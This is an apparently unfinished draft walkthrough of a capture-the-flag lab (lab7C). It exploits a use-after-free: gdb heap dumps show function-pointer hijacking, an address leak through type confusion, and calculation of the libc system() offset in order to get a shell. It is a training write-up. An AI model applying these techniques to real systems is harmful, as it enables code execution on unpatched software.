   
We already know what we are gonna do:

1) make a number
2) delete the number
3) make a string (overwriting what was left after the just-freed number
4) call print number on the memory range now occupied by the string

<add the static analysis part here, draw that diagram> 
We're gonna do a first crash:


OK, let's debug this more conveniently. First, a breakpoint at the menu loop:

gdb-peda$ b *(main+174)
Breakpoint 1 at 0xdf3

0x00000dee <+169>:   call   0xd03 <print_menu>
0x00000df3 <+174>:   call   0xb29 <get_unum>


Second, we'll input a string and simply search for it.


gdb-peda$ vmmap
Start      End        Perm      Name
0xb75b9000 0xb75ba000 rw-p      mapped
0xb75ba000 0xb7762000 r-xp      /lib/i386-linux-gnu/libc-2.19.so
0xb7762000 0xb7764000 r--p      /lib/i386-linux-gnu/libc-2.19.so
0xb7764000 0xb7765000 rw-p      /lib/i386-linux-gnu/libc-2.19.so
0xb7765000 0xb7768000 rw-p      mapped
0xb776f000 0xb7772000 rw-p      mapped
0xb7772000 0xb7773000 r-xp      [vdso]
0xb7773000 0xb7775000 r--p      [vvar]
0xb7775000 0xb7795000 r-xp      /lib/i386-linux-gnu/ld-2.19.so
0xb7795000 0xb7796000 r--p      /lib/i386-linux-gnu/ld-2.19.so
0xb7796000 0xb7797000 rw-p      /lib/i386-linux-gnu/ld-2.19.so
0xb7797000 0xb7799000 r-xp      /levels/lab07/lab7C
0xb7799000 0xb779a000 r--p      /levels/lab07/lab7C
0xb779a000 0xb779b000 rw-p      /levels/lab07/lab7C
0xbfd35000 0xbfd56000 rw-p      [stack]

gdb-peda$ c
Continuing.
Enter Choice: 1
Input string to store: AAAAAAAAAABBBBBBBBB
Created new string!


gdb-peda$ searchmem AAAA 0xb7765000 0xb7768000
Searching for 'AAAA' in range: 0xb7765000 - 0xb7768000
Not found
gdb-peda$ searchmem AAAA 0xb776f000 0xb7772000
Searching for 'AAAA' in range: 0xb776f000 - 0xb7772000
Not found
gdb-peda$ searchmem AAAA 0xb7773000 0xb7775000
Searching for 'AAAA' in range: 0xb7773000 - 0xb7775000
Not found

Mhm. Let's see vmmap again:

gdb-peda$ vmmap
Start      End        Perm      Name
0xb75b9000 0xb75ba000 rw-p      mapped
0xb75ba000 0xb7762000 r-xp      /lib/i386-linux-gnu/libc-2.19.so
0xb7762000 0xb7764000 r--p      /lib/i386-linux-gnu/libc-2.19.so
0xb7764000 0xb7765000 rw-p      /lib/i386-linux-gnu/libc-2.19.so
0xb7765000 0xb7768000 rw-p      mapped
0xb776e000 0xb7772000 rw-p      mapped
0xb7772000 0xb7773000 r-xp      [vdso]
0xb7773000 0xb7775000 r--p      [vvar]
0xb7775000 0xb7795000 r-xp      /lib/i386-linux-gnu/ld-2.19.so
0xb7795000 0xb7796000 r--p      /lib/i386-linux-gnu/ld-2.19.so
0xb7796000 0xb7797000 rw-p      /lib/i386-linux-gnu/ld-2.19.so
0xb7797000 0xb7799000 r-xp      /levels/lab07/lab7C
0xb7799000 0xb779a000 r--p      /levels/lab07/lab7C
0xb779a000 0xb779b000 rw-p      /levels/lab07/lab7C
0xb8bfe000 0xb8c1f000 rw-p      [heap]		<-- AHA!
0xbfd35000 0xbfd56000 rw-p      [stack]

So the heap segment got mapped after the first malloc() call. Fair enough.

gdb-peda$ searchmem AAAA 0xb8bfe000 0xb8c1f000
Searching for 'AAAA' in range: 0xb8bfe000 - 0xb8c1f000
Found 2 results, display max 2 items:
[heap] : 0xb8bfe010 ("AAAAAAAAAABBBBBBBBB")
[heap] : 0xb8bfe014 ("AAAAAABBBBBBBBB")

Okie dokie.

gdb-peda$ x/100wx 0xb8bfe010
0xb8bfe010:     0x41414141      0x41414141      0x42424141      0x42424242
0xb8bfe020:     0x00424242      0xb7797c16      0x00000000      0x00020fd9
0xb8bfe030:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8bfe040:     0x00000000      0x00000000      0x00000000      0x00000000

OK. But we know the structure goes like this:

struct data {
    char reserved[8];
    char buffer[20];
    void (* print)(char *);
};

And that the heap starts at 0xb8bfe000. So let's print from there:

gdb-peda$ x/100wx 0xb8bfe000
0xb8bfe000:     0x00000000      0x00000029      0x00000000      0x00000000
0xb8bfe010:     0x41414141      0x41414141      0x42424141      0x42424242
0xb8bfe020:     0x00424242      0xb7797c16      0x00000000      0x00020fd9
0xb8bfe030:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8bfe040:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8bfe050:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8bfe060:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8bfe070:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8bfe080:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8bfe090:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8bfe0a0:     0x00000000      0x00000000      0x00000000      0x00000000

OK. It seems these first eight bytes:
gdb-peda$ x/2wx 0xb8bfe000
0xb8bfe000:     0x00000000      0x00000029

are the malloc chunk metadata. 

Next eight bytes are the 'reserved' field:

gdb-peda$ x/2wx 0xb8bfe008
0xb8bfe008:     0x00000000      0x00000000

Then there's 20 bytes of the buffer we filled with A-s and B-s (19 characters plus the nullbyte):

gdb-peda$ x/5wx 0xb8bfe010
0xb8bfe010:     0x41414141      0x41414141      0x42424141      0x42424242
0xb8bfe020:     0x00424242

And lastly, there's the "void (* print)(char *);" pointer, pointing at the big_str function:

gdb-peda$ x/1wx 0xb8bfe024
0xb8bfe024:     0xb7797c16

gdb-peda$ x 0xb7797c16
0xb7797c16 <big_str>:   0x53e58955

And lastly, this, also looking like malloc()'s metadata:
gdb-peda$  x/1wx 0xb8bfe02c
0xb8bfe02c:     0x00020fd9
OK, now let's see what happens once we 'delete' this string.

gdb-peda$ c
Continuing.
Enter Choice: 3
Deleted most recent string!


As we can see, everything on the heap is intact:

Breakpoint 1, 0xb7797df3 in main ()
gdb-peda$ x/100wx 0xb8bfe000
0xb8bfe000:     0x00000000      0x00000029      0x00000000      0x00000000
0xb8bfe010:     0x41414141      0x41414141      0x42424141      0x42424242
0xb8bfe020:     0x00424242      0xb7797c16      0x00000000      0x00020fd9
0xb8bfe030:     0x00000000      0x00000000      0x00000000      0x00000000

OK, now let's try to print a number (which we did not create) and see what happens (my expectation is a segfault, as the last two least significant bytes of the 'reserved' field in the string will be treated as a function pointer, along with the first two A-s, effectively calling 0x00004141, which is not within the address space).

Let's see:

gdb-peda$ c
Continuing.
Enter Choice: 6
Number index to print: 1
There is no number to print!

Huh. Right, this is because the number's not been initialized. Fair enough.

We have to do it the other way. First declare a number, then delete it, then create a string, then call a number.

We want to put C-s in that number, to spot it easier:
/mnt/c/Users/ewilded$ printf "%d" 0x43434343
1128481603linux@DESKTOP-C7SN3L7:/mnt/c/Users/ewilded$

Continuing.
Enter Choice: 2
Input number to store: 1128481603
Created new number!

OK, let's see the heap:
gdb-peda$  x/100wx 0xb8bfe000

0xb8bfe000:     0x00000000      0x00000029      0x00000000      0x00000000
0xb8bfe010:     0x41414141      0x41414141      0x42424141      0x42424242
0xb8bfe020:     0xb7797cb4      0x43434343      0x00000000      0x00020fd9

Now, compare it with the heap when we had the string on it:

gdb-peda$ x/100wx 0xb8bfe000
0xb8bfe000:     0x00000000      0x00000029      0x00000000      0x00000000
0xb8bfe010:     0x41414141      0x41414141      0x42424141      0x42424242
0xb8bfe020:     0x00424242      0xb7797c16      0x00000000      0x00020fd9

So, 0xb8bfe020 currently contains the 0xb7797cb4 (big_num() address), while previously it was the end of our buffer. 

Apparently the buffer is filled with numbers from the other direction than I expected. OK, let's add another one.

This time E-s:

gdb-peda$ c
Continuing.
Enter Choice: 2
Input number to store: 1162167621
Created new number!


And:

gdb-peda$  x/100wx 0xb8bfe000
0xb8bfe000:     0x00000000      0x00000029      				0x00000000      0x00000000
0xb8bfe010:     0x41414141      0x41414141      				0x42424141      0x42424242
0xb8bfe020:     0xb7797cb4      0x43434343   <-- first number   0x00000000      0x00000029 
0xb8bfe030:     0x00000000      0x00000000      				0x00000000      0x00000000
0xb8bfe040:     0x00000000      0x00000000      				0xb7797cb4      0x45454545  <-- second number
0xb8bfe050:     0x00000000      0x00020fb1   <-- malloc meta    0x00000000      0x00000000
0xb8bfe060:     0x00000000      0x00000000      				0x00000000      0x00000000

I get there are six bytes for the 'reserved' thing in the number structure, which makes it effectively 8 (padding to multiple of four).



OK, let's restart the program and observe this again. Create three numbers.

gdb-peda$ b *(main+169)
Breakpoint 1 at 0xdee

1094795585
1111638594
1128481603

First:
gdb-peda$ x/100wx 0xb8611000
0xb8611000:     0x00000000      0x00000029      0x00000000      0x00000000
0xb8611010:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8611020:     0xb770ccb4      0x41414141      0x00000000      0x00020fd9
0xb8611030:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8611040:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8611050:     0x00000000      0x00000000      0x00000000      0x00000000

Second:
gdb-peda$ x/100wx 0xb8611000
0xb8611000:     0x00000000      0x00000029      0x00000000      0x00000000
0xb8611010:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8611020:     0xb770ccb4      0x41414141      0x00000000      0x00000029
0xb8611030:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8611040:     0x00000000      0x00000000      0xb770ccb4      0x42424242
0xb8611050:     0x00000000      0x00020fb1      0x00000000      0x00000000
0xb8611060:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8611070:     0x00000000      0x00000000      0x00000000      0x00000000

Third:

gdb-peda$ x/100wx 0xb8611000
0xb8611000:     0x00000000      0x00000029      0x00000000      0x00000000
0xb8611010:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8611020:     0xb770ccb4      0x41414141      0x00000000      0x00000029
0xb8611030:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8611040:     0x00000000      0x00000000      0xb770ccb4      0x42424242
0xb8611050:     0x00000000      0x00000029      0x00000000      0x00000000
0xb8611060:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8611070:     0xb770ccb4      0x43434343      0x00000000      0x00020f89
0xb8611080:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8611090:     0x00000000      0x00000000      0x00000000      0x00000000

OK. It's seems malloc() is padding those strctures to 32 bytes anyway.

Now let's see how strings get aligned.

And here's the (new, after a restart) heap with three strings added (AAAAAAAAAAAAAAAAAAA, BBBBBBBBBBBBBBBBBBB, CCCCCCCCCCCCCCCCCCC):

gdb-peda$ x/100wx 0xb8559000
0xb8559000:     0x00000000      0x00000029      0x00000000      0x00000000
0xb8559010:     0x41414141      0x41414141      0x41414141      0x41414141
0xb8559020:     0x00414141      0xb774dc16      0x00000000      0x00000029
0xb8559030:     0x00000000      0x00000000      0x42424242      0x42424242
0xb8559040:     0x42424242      0x42424242      0x00424242      0xb774dc16
0xb8559050:     0x00000000      0x00000029      0x00000000      0x00000000
0xb8559060:     0x43434343      0x43434343      0x43434343      0x43434343
0xb8559070:     0x00434343      0xb774dc16      0x00000000      0x00020f89
0xb8559080:     0x00000000      0x00000000      0x00000000      0x00000000
0xb8559090:     0x00000000      0x00000000      0x00000000      0x00000000

So yeah. Three 32-byte 'data' structures took the same space on the heap as three 16-byte 'number' structures. Exactly the same.

Either way, comparing these two layouts visually made it clear to me how to achieve execution control.

We can see that in the number structure, the function pointer occupies the same space that, when alllocated with a string, always contains at least one nullbyte (because the string is automatically null-terminated by fgets and we can't control it). Hence, allocating a number, then deleting it, allocating a string in its place and then requesting the program to print the number won't get us far  (we'll crash the program), as we only control up to three bytes and we are not even overwriting a function pointer, so a partial overwrite won't help us (fgets will always put a null where we want something arbitrary).

At the same time we can see that the space holding the actual number value (which we can control fully as numbers from all ranges are acceptable) sits in the same place as the function pointer for the string structure. Hence, allocating a string, deleting it, creating an arbitrary number and then requesting the string to be printed would effectively lead to the program trying to print the no longer existing string with code pointed by the our newly created number, treating it as a pointer.

Let's try it:
Continuing.
-- UAF Playground Menu ----------------------
1. Make a string
2. Make a number
3. Delete a string
4. Delete a number
5. Print a string
6. Print a number
7. Quit
---------------------------------------------
Enter Choice: 1
Input string to store: GGGGGGGGGGGGGGGGGGG
Created new string!

Continuing.
-- UAF Playground Menu ----------------------
1. Make a string
2. Make a number
3. Delete a string
4. Delete a number
5. Print a string
6. Print a number
7. Quit
---------------------------------------------
Enter Choice: 3
Deleted most recent string!

printf "%d" 0x31337157
825454935

Enter Choice: 2
Input number to store: 825454935
Created new number!

Now, 'print' the string should lead to a segfault at 0x31337157:

Enter Choice: 5
String index to print: 1

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x31337157 ('Wq31')
EBX: 0xb774ff98 --> 0x2ea0
ECX: 0xb771b8a4 --> 0x0
EDX: 0xb8559010 ('G' <repeats 16 times>, "\264\334t\267Wq31")
ESI: 0x18
EDI: 0x0
EBP: 0xbfd87698 --> 0x0
ESP: 0xbfd8760c --> 0xb774e071 (<main+812>:     jmp    0xb774e0fb <main+950>)
EIP: 0x31337157 ('Wq31')
EFLAGS: 0x10292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x31337157
[------------------------------------stack-------------------------------------]
0000| 0xbfd8760c --> 0xb774e071 (<main+812>:    jmp    0xb774e0fb <main+950>)
0004| 0xbfd87610 --> 0xb8559010 ('G' <repeats 16 times>, "\264\334t\267Wq31")
0008| 0xbfd87614 --> 0xb774e357 --> 0x7243000a ('\n')
0012| 0xbfd87618 --> 0xb771ac20 --> 0xfbad2288
0016| 0xbfd8761c --> 0xc2
0020| 0xbfd87620 --> 0x1
0024| 0xbfd87624 --> 0x0
0028| 0xbfd87628 --> 0xbfd87734 --> 0xbfd878b8 ("/levels/lab07/lab7C")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x31337157 in ?? ()

Yup. The string itself will be useful to us to control the arguments.
If we look on the corresponding fields on the heap layout we'll see that first 16 bytes of the string buffer are occupied by the 'reserved' fields in the number structure, which means that if we allocate a number after removing a string, taking the space it was allocated on, the first 16 bytes of the structure (6 bytes 'reserved' and 2 bytes of padding) will be left alone with the old values from the string.

So calling system("sh") should be doable:
1) create a string "sh"
2) delete the string
3) create a number == libc system()'s address
4) 'print' the string

The only problem we have got left to figure out is how to leak the memory layout.

Looking at the layout again brought me the potential answer to this literally after the first glance (which proves how having visual representation of the memory is a huge help).

As we want to leak memory, we need to call a function taking as argument a piece of memory that happens to store a pointer.

The goal is to see both possible states of the memory combined and find such a combination of values that will let us achieve our goal. Let's look at the layout again, this time focusing on two particular neighboring double word values we would like to have in one state - and then think if we can groom the memory into that state:
[want_these_two_together.png]

When the space is occupied by a number structure, the <base>+0x20 address contains a pointer (the print function, marked red), while <base>+0x24 contains data (the number, in this case 0x41414141, but that's irrelevant to our goal, thus marked grey).

Conversely, when the space is occupied by a data structure, the <base>+0x20 address contains data (the last three bytes of the string and its terminating nullbyte - useless to us, hence marked gray), while <base>+0x24 contains a pointer (the print function, marked red).

We want to trick the program to create that state, so we can call the big_num/small_num number-printing function, with the address of the string-printing function sitting in the space previously occupied by an irrelevant number before it was free()d and then allocated again (but not entirely overwritten!) for the string structure.

So, we create a number, then we remove it (so the number[index] is not 0, even though the structure it was pointing at was 'removed', which means free()'d).

Then we create a relatively short (less than 15-characters) string, to avoid fgets() overwriting the last four bytes of the buff[20], because that is where the print number pointer is held and we will want to call it, so it prints out the address of the string print function for us, thus giving us the info needed for crafting the exploit.

Let's try this without debugging too much (just check if the result is correct after performing the actions, using the breakpoint in the main loop):
b *(main+169)

So:

lab7C@warzone:/levels/lab07$ gdb ./lab7C
Reading symbols from ./lab7C...(no debugging symbols found)...done.
gdb-peda$ b *(main+169)
Breakpoint 1 at 0xdee
gdb-peda$ c
Continuing.

-- UAF Playground Menu ----------------------
1. Make a string
2. Make a number
3. Delete a string
4. Delete a number
5. Print a string
6. Print a number
7. Quit
---------------------------------------------
Enter Choice: 2
Input number to store: 3
Created new number!

...
Breakpoint 1, 0xb7744dee in main ()
gdb-peda$ c
Continuing.
-- UAF Playground Menu ----------------------
1. Make a string
2. Make a number
3. Delete a string
4. Delete a number
5. Print a string
6. Print a number
7. Quit
---------------------------------------------
Enter Choice: 4
Deleted most recent number!

Breakpoint 1, 0xb7744dee in main ()
gdb-peda$ c
Continuing.
-- UAF Playground Menu ----------------------
1. Make a string
2. Make a number
3. Delete a string
4. Delete a number
5. Print a string
6. Print a number
7. Quit
---------------------------------------------
Enter Choice: 1
Input string to store: fuck
Created new string!

...

Breakpoint 1, 0xb7744dee in main ()
gdb-peda$ c
Continuing.
-- UAF Playground Menu ----------------------
1. Make a string
2. Make a number
3. Delete a string
4. Delete a number
5. Print a string
6. Print a number
7. Quit
---------------------------------------------
Enter Choice: 6
Number index to print: 1
not 1337 enough: 3077852103

So, we have a number vomitted out. Let's convert it to a format more readable to us:

$ printf "%x" 3077852103
b7744bc7

Looks good. Let's confirm in gdb:

gdb-peda$ x/i 0xb7744bc7
   0xb7744bc7 <small_str>:      push   ebp
   
Yup. It's the small_str() function.

OK, once again, in slow motion (now we'll show step-by-step how the data on the heap changes).

First, we allocate a number (1):
---------------------------------------------
Enter Choice: 2
Input number to store: 1
Created new number!

Now, this is the heap:
gdb-peda$ x/100wx 0xb84f3000
0xb84f3000:     0x00000000      0x00000029      0x00000000      0x00000000
0xb84f3010:     0x00000000      0x00000000      0x00000000      0x00000000
0xb84f3020:     0xb779dc65      0x00000001      0x00000000      0x00020fd9

[heap_1.png]

Now, we remove the number:

---------------------------------------------
Enter Choice: 4
Deleted most recent number!

And again, this is the heap (yes, everything is till there after free():

[heap_1.png]

Now, we make a string up to 16 characters:

---------------------------------------------
Enter Choice: 1
Input string to store: fuck
Created new string!

Now, this is the heap:

gdb-peda$ x/100wx 0xb84f3000
0xb84f3000:     0x00000000      0x00000029      0x00000000      0x00000000
0xb84f3010:     0x6b637566      0x00000000      0x00000000      0x00000000
0xb84f3020:     0xb779dc65      0xb779dbc7      0x00000000      0x00020fd9

[heap_2.png]

Now, requesting the program to print the number[1] will make it call 0xb779dc65 (big_num) with 0xb779dbc7 as argument, so we have our leak.

Awesome. It looks like we have all the bits and pieces to develop an exploit :D

Breakpoint 1, 0xb77b2dee in main ()
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xb7615190 <__libc_system>
gdb-peda$ p printf
$2 = {<text variable, no debug info>} 0xb7622280 <__printf>


Calculations:

0xb77b2000 0xb77b4000 r-xp      /levels/lab07/lab7C
0xb77b4000 0xb77b5000 r--p      /levels/lab07/lab7C
0xb77b5000 0xb77b6000 rw-p      /levels/lab07/lab7C


gdb-peda$ searchmem 0xb7622280 0xb77b4000 0xb77b5000
Searching for '0xb7622280' in range: 0xb77b4000 - 0xb77b5000
Found 1 results, display max 1 items:
lab7C : 0xb77b4fa4 --> 0xb7622280 (<__printf>:  push   ebx)

This time (as opposed to lab6A walkthrough here) our entry is at 0xfa4 offset in rodata. This is probably because of the '-z relro' gcc compilation flag.
That's OK.

First, we'll leak the code base. Then we'll leak the printf() address. Then we'll calculate system's address. Then get a shell.

Ah, one more thing. In order to properly leak the libc base, first we have to exploit our use after free the same way we plan to when doing arbitrary code exec (arbitrary function with an arbitrary value provided as an argument). We need to find a proper gadget for this...

I guess printf("%d",pointer); will do the trick. The problem is that our UAF supports ONE argument...

OK, let's try once again whether we have to the second leak at all. Maybe the libc is always loaded at a particular relative offset to the program segments (code, rodata, data):

One run:

gdb-peda$ vmmap
Start      End        Perm      Name
0xb75bf000 0xb75c0000 rw-p      mapped
0xb75c0000 0xb7768000 r-xp      /lib/i386-linux-gnu/libc-2.19.so
0xb7768000 0xb776a000 r--p      /lib/i386-linux-gnu/libc-2.19.so
0xb776a000 0xb776b000 rw-p      /lib/i386-linux-gnu/libc-2.19.so
0xb776b000 0xb776e000 rw-p      mapped
0xb7774000 0xb7778000 rw-p      mapped
0xb7778000 0xb7779000 r-xp      [vdso]
0xb7779000 0xb777b000 r--p      [vvar]
0xb777b000 0xb779b000 r-xp      /lib/i386-linux-gnu/ld-2.19.so
0xb779b000 0xb779c000 r--p      /lib/i386-linux-gnu/ld-2.19.so
0xb779c000 0xb779d000 rw-p      /lib/i386-linux-gnu/ld-2.19.so
0xb779d000 0xb779f000 r-xp      /levels/lab07/lab7C
0xb779f000 0xb77a0000 r--p      /levels/lab07/lab7C
0xb77a0000 0xb77a1000 rw-p      /levels/lab07/lab7C
0xb84f3000 0xb8514000 rw-p      [heap]
0xbf7fc000 0xbf81d000 rw-p      [stack]
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xb7600190 <__libc_system>

Another run:
gdb-peda$ vmmap
Start      End        Perm      Name
0xb756d000 0xb756e000 rw-p      mapped
0xb756e000 0xb7716000 r-xp      /lib/i386-linux-gnu/libc-2.19.so
0xb7716000 0xb7718000 r--p      /lib/i386-linux-gnu/libc-2.19.so
0xb7718000 0xb7719000 rw-p      /lib/i386-linux-gnu/libc-2.19.so
0xb7719000 0xb771c000 rw-p      mapped
0xb7724000 0xb7726000 rw-p      mapped
0xb7726000 0xb7727000 r-xp      [vdso]
0xb7727000 0xb7729000 r--p      [vvar]
0xb7729000 0xb7749000 r-xp      /lib/i386-linux-gnu/ld-2.19.so
0xb7749000 0xb774a000 r--p      /lib/i386-linux-gnu/ld-2.19.so
0xb774a000 0xb774b000 rw-p      /lib/i386-linux-gnu/ld-2.19.so
0xb774b000 0xb774d000 r-xp      /levels/lab07/lab7C
0xb774d000 0xb774e000 r--p      /levels/lab07/lab7C
0xb774e000 0xb774f000 rw-p      /levels/lab07/lab7C
0xbfb41000 0xbfb62000 rw-p      [stack]

Yup, in both cases the offets are the same:

gdb-peda$ p 0xb774b000-0xb756e000
$1 = 0x1dd000
gdb-peda$ p 0xb779d000-0xb75c0000
$2 = 0x1dd000

Hence, one leak is enough here (which might not be the case for the stack of the heaps, but we don't care about this here):

gdb-peda$ p system
$3 = {<text variable, no debug info>} 0xb75ae190 <__libc_system>

system's() offset within the libc() segment (as opposed to calculating the difference from the relative printf() offset):

gdb-peda$ p 0xb75ae190-0xb756e000
$4 = 0x40190


Another run:

gdb-peda$ vmmap
Start      End        Perm      Name
0xb75db000 0xb75dc000 rw-p      mapped
0xb75dc000 0xb7784000 r-xp      /lib/i386-linux-gnu/libc-2.19.so
0xb7784000 0xb7786000 r--p      /lib/i386-linux-gnu/libc-2.19.so
0xb7786000 0xb7787000 rw-p      /lib/i386-linux-gnu/libc-2.19.so
0xb7787000 0xb778a000 rw-p      mapped
0xb7792000 0xb7794000 rw-p      mapped
0xb7794000 0xb7795000 r-xp      [vdso]
0xb7795000 0xb7797000 r--p      [vvar]
0xb7797000 0xb77b7000 r-xp      /lib/i386-linux-gnu/ld-2.19.so
0xb77b7000 0xb77b8000 r--p      /lib/i386-linux-gnu/ld-2.19.so
0xb77b8000 0xb77b9000 rw-p      /lib/i386-linux-gnu/ld-2.19.so
0xb77b9000 0xb77bb000 r-xp      /levels/lab07/lab7C
0xb77bb000 0xb77bc000 r--p      /levels/lab07/lab7C
0xb77bc000 0xb77bd000 rw-p      /levels/lab07/lab7C
0xbfd16000 0xbfd37000 rw-p      [stack]
gdb-peda$ p 0xb761c190-0xb75dc000
$2 = 0x40190

Yup. It's the same :D



